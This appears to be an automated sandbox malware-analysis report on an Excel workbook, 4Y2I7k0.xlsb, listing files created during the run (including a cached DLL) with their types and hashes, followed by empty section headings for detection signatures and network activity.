C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\errorPageStrings[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D65EC06F21C379C87040B83CC1ABAC6B	208D0A0BB775661758394BE7E4AFB18357E46C8B	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\errorPageStrings[2]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D65EC06F21C379C87040B83CC1ABAC6B	208D0A0BB775661758394BE7E4AFB18357E46C8B	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\httpErrorPagesScripts[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	9234071287E637F85D721463C488704C	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\http_404[1]	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	F65C729DC2D457B7A1093813F1253192	5006C9B50108CF582BE308411B157574E5A893FC	B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\http_404[2]	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	F65C729DC2D457B7A1093813F1253192	5006C9B50108CF582BE308411B157574E5A893FC	B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\info_48[1]	PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced	5565250FCC163AA3A79F0B746416CE69	B97CC66471FCDEE07D0EE36C7FB03F342C231F8F	51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\background_gradient[1]	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3	20F0110ED5E4E0D5384A496E4880139B	51F5FC61D8BF19100DF0F8AADAA57FCD9C086255	1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\bullet[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	26F971D87CA00E23BD2D064524AEF838	7440BEFF2F4F8FABC9315608A13BF26CABAD27D9	1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\down[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	C4F558C4C8B56858F15C09037CD6625A	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\errorPageStrings[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D65EC06F21C379C87040B83CC1ABAC6B	208D0A0BB775661758394BE7E4AFB18357E46C8B	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\httpErrorPagesScripts[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	9234071287E637F85D721463C488704C	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\http_404[1]	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	F65C729DC2D457B7A1093813F1253192	5006C9B50108CF582BE308411B157574E5A893FC	B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\info_48[1]	PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced	5565250FCC163AA3A79F0B746416CE69	B97CC66471FCDEE07D0EE36C7FB03F342C231F8F	51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\ErrorPageTemplate[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	F4FE1CB77E758E1BA56B8A8EC20417C5	F4EDA06901EDB98633A686B11D02F4925F827BF0	8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\background_gradient[1]	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3	20F0110ED5E4E0D5384A496E4880139B	51F5FC61D8BF19100DF0F8AADAA57FCD9C086255	1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\bullet[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	26F971D87CA00E23BD2D064524AEF838	7440BEFF2F4F8FABC9315608A13BF26CABAD27D9	1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\down[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	C4F558C4C8B56858F15C09037CD6625A	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\httpErrorPagesScripts[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	9234071287E637F85D721463C488704C	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\http_404[1]	HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	F65C729DC2D457B7A1093813F1253192	5006C9B50108CF582BE308411B157574E5A893FC	B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\info_48[1]	PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced	5565250FCC163AA3A79F0B746416CE69	B97CC66471FCDEE07D0EE36C7FB03F342C231F8F	51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	5A7C87DAB250CEE78CE63AC34117012B	554C4CCF2341182768D475087D8A8BCFAA525A12	8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
C:\Users\user\AppData\Local\Temp\BC720000	data	C6261A1A4DA92DB8DA12914226F32320	BBD0F67E5336BB3049BB9060F808695D3A3DAE5D	2795A7BED8DDE576771990F5A15EA8E3BEC6F279DF4F865F1A2D41A03741EF49
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	C2703845356CB36B8DE96D2AB6742EE8	AC2E2A914D5CD124E9F9A43C6C0962E852EBC508	9B4EC307A7435836581327348B740083E51C3FD83BADC4E99794E38A69FEA875
C:\Users\user\AppData\Local\Temp\~DF02FD31EDF5DE2395.TMP	data	9FCE990D51D75E7EC6CD266494A3C9DD	37E4928296E6705A6AE76F7F7660D514E6949194	82E575D088117A82B5503CFE1BB7139082DA67D7CA314BC90B22EB12AB1F409C
C:\Users\user\AppData\Local\Temp\~DF0F9DAFE54CC87186.TMP	data	B25FA93D7A6D48C2F016EF4777D8F40F	81711EBC6B0F2F0ABEA0319FC8F6AB28C67D7D79	95F9B5DA5B493172B3FD9B65D5B43AE7C62F9A7B8D1BD74350382463B095B23C
C:\Users\user\AppData\Local\Temp\~DF2579002E7DBD0D23.TMP	data	B2E25AB0EB7388614460F355867D849F	63EA657F8826535B91892072FB0FA19F362E70F7	9FE0AC5EB9497BA57F5F502C3B262BFCDB869D049389C44320DE00FE2144D6E9
C:\Users\user\AppData\Local\Temp\~DF6C0FD439615FE33F.TMP	data	0EE1DE6F07284C5B601E7235FFF99D78	791EE6A2DD9FEC76518B1DA4B0B817D70FAF0F87	46FE243D1F227418CF73E74C57D27DF367644F1898325405750323CDCAE2763F
C:\Users\user\AppData\Local\Temp\~DFDBB22478A09DBEE7.TMP	data	85896B06821A6C93F78AA44C34BC029B	3E4E83860DE0428A3A7A9FBF68DAE899B0506EA9	8A83D57BA19E55BA62096DBB1E1F6E266ED184865A0A4C8D82D5B8F4FA4783B9
C:\Users\user\AppData\Local\Temp\~DFE1E79D939C6A2141.TMP	data	919526506D4B1A5CCF81593F749ABBFC	1444F8F74D52F9B674555E91296EF197F5A191C5	E403E2A35DC16739E13AB42037AFC1145124B7F929887FF012F6A5641EB7C4F4
C:\Users\user\AppData\Local\Temp\~DFE50DD3890F342E92.TMP	data	B179C02F75A20B4E06E535CD5C278364	4D912825B1C4E3C1DD649993276F7A36F43AD6BB	1FE5E8C7288BC424865D6E42E85AA5EDF4445C4AB6BEB32EAC8AE947F7F68D1D
C:\Users\user\AppData\Local\Temp\~DFF7BA5DE226E46A61.TMP	data	C91703A7A48C5535C1E7DBE1D0147547	E9C21D55FCA4278C2B1106497168FA01318598C0	FDD805C7BD48270CCFB1A0CE054E18BE02D4F5264B8792C4697D043598910756
C:\Users\user\Desktop\~$4Y2I7k0.xlsb	data	7AB76C81182111AC93ACF915CA8331D5	68B94B5D4C83A6FB415C8026AF61F3F8745E2559	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF

Analysis Report 4Y2I7k0.xlsb

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs